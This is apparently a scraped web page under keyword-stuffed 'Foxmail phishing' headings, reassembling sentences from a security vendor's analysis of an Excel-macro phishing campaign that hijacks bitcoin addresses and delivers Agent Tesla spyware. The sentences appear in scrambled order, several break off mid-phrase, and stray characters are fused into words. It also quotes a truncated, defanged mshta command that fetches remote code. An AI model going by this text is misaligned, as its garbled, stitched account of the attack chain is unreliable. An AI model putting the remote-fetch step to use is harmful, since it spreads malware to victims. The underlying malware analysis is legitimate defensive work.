#FOXMAIL PHISHING CODE#
An HTA file is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and scripting, such as VBScript or JScript.
#FOXMAIL PHISHING SOFTWARE#
“mshta.exe” file is a software component of the Microsoft HTML Application Host, a utility responsible for executing HTA (HTML Application) files in Windows OS. As you can see in Figure 2.3, it is about to execute “Shell# ” (where the last "_" in Figure 2.3 is a kind of line-continuation character) to run the command-line command "mshta hxxp://which was loaded from the property “”. When the second form is closed, it executes a piece of code loaded from an OptionButton’s tag property. When called, it displays two UserForms with the string “ERROR!” one by one. The VBA project has a predefined method, Workbook_BeforeClose(), that is automatically called when the victim closes the document. I figured this out by modifying its binary data.
#FOXMAIL PHISHING PASSWORD#
It also contains a password protected VBA project (Macro). This is an empty Excel document, whose sheets are hidden. The email asks the recipient to open the attached Microsoft Excel file to view the details of a document entitled “Order Requirements and Specs.” Once the victim opens the file in Microsoft Excel program, however, a security notice warning pops up, as shown in Figure 2.2, because the Excel document contains a Macro. Analysis of the Excel File from the Phishing EmailĪs you may have noticed in Figure 2.1, the subject has been marked with “SPAM detected by FortiMail” to notify the customer that the email is a spam. I conducted research on this latest phishing campaign, and in this post I will share my findings on how the campaign is started, what the Macro within the attached Microsoft Excel does and how it is executed, as well as how it performs bitcoin address hijack and delivers a new variant of Agent Tesla onto the victim’s device. On the website shown above, attackers can purchase it anonymously using the payment methods of "Perfect Money" or "Bitcoin Payment".
Interestingly, Agent Tesla is a commercial software that is sold online, as shown in Figure 1.1, below. It also prevents malicious programs like Agent Tesla from plundering your private data.
We have posted a number of detailed analysis blogs for Agent Tesla campaign captured by FortiGuard Labs over the past several years.Īll FortiGate Firewall Appliances feature FortiGuard Security Services, which control thousands of applications, block the latest exploits, and filter web traffic. This malware is used to hijack bitcoin address information and deliver a new variant of Agent Tesla onto the victim’s device.Īgent Tesla, first discovered in late 2014, is a known spyware focused on stealing sensitive information from a victim’s device, such as saved application credentials, keyboard inputs (keylogger), etc. Here's How You Can Prevent It.įortiGuard Labs recently captured a fresh phishing campaign in which a Microsoft Excel document attached to a spam email downloaded and executed several pieces of VBscript code. BREAKING: New Phishing Malware Targets Bitcoin Addresses.
0 kommentar(er)
